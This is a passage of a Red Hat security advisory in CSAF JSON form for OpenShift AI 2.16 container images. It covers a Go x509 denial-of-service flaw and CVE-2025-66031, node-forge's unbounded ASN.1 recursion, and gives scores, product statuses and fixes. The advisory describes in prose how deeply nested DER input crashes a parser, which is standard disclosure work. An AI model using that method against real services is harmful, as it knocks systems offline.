"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "crypto/x509: golang: Denial of Service due to excessive resource consumption via crafted certificate"
},
{
"cve": "CVE-2025-66031",
"cwe": {
"id": "CWE-674",
"name": "Uncontrolled Recursion"
},
"discovery_date": "2025-11-26T23:01:36.363253+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2417397"
}
],
"notes": [
{
"category": "description",
"text": "An ASN.1 Denial of Service (Dos) vulnerability exists in the node-forge asn1.fromDer function within forge/lib/asn1.js. The ASN.1 DER parser implementation (_fromDer) recurses for every constructed ASN.1 value (SEQUENCE, SET, etc.) and lacks a guard limiting recursion depth. An attacker can craft a small DER blob containing a very large nesting depth of constructed TLVs which causes the Node.js V8 engine to exhaust its call stack and throw RangeError: Maximum call stack size exceeded, crashing or incapacitating the process handling the parse. This is a remote, low-cost Denial-of-Service against applications that parse untrusted ASN.1 objects.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "node-forge: node-forge ASN.1 Unbounded Recursion",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-66031"
},
{
"category": "external",
"summary": "RHBZ#2417397",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2417397"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-66031",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66031"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-66031",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66031"
},
{
"category": "external",
"summary": "https://github.com/digitalbazaar/forge/commit/260425c6167a38aae038697132483b5517b26451",
"url": "https://github.com/digitalbazaar/forge/commit/260425c6167a38aae038697132483b5517b26451"
},
{
"category": "external",
"summary": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-554w-wpv2-vw27",
"url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-554w-wpv2-vw27"
}
],
"release_date": "2025-11-26T22:23:26.013000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-25T12:32:51+00:00",
"details": "For Red Hat OpenShift AI 2.16.4 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5807"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
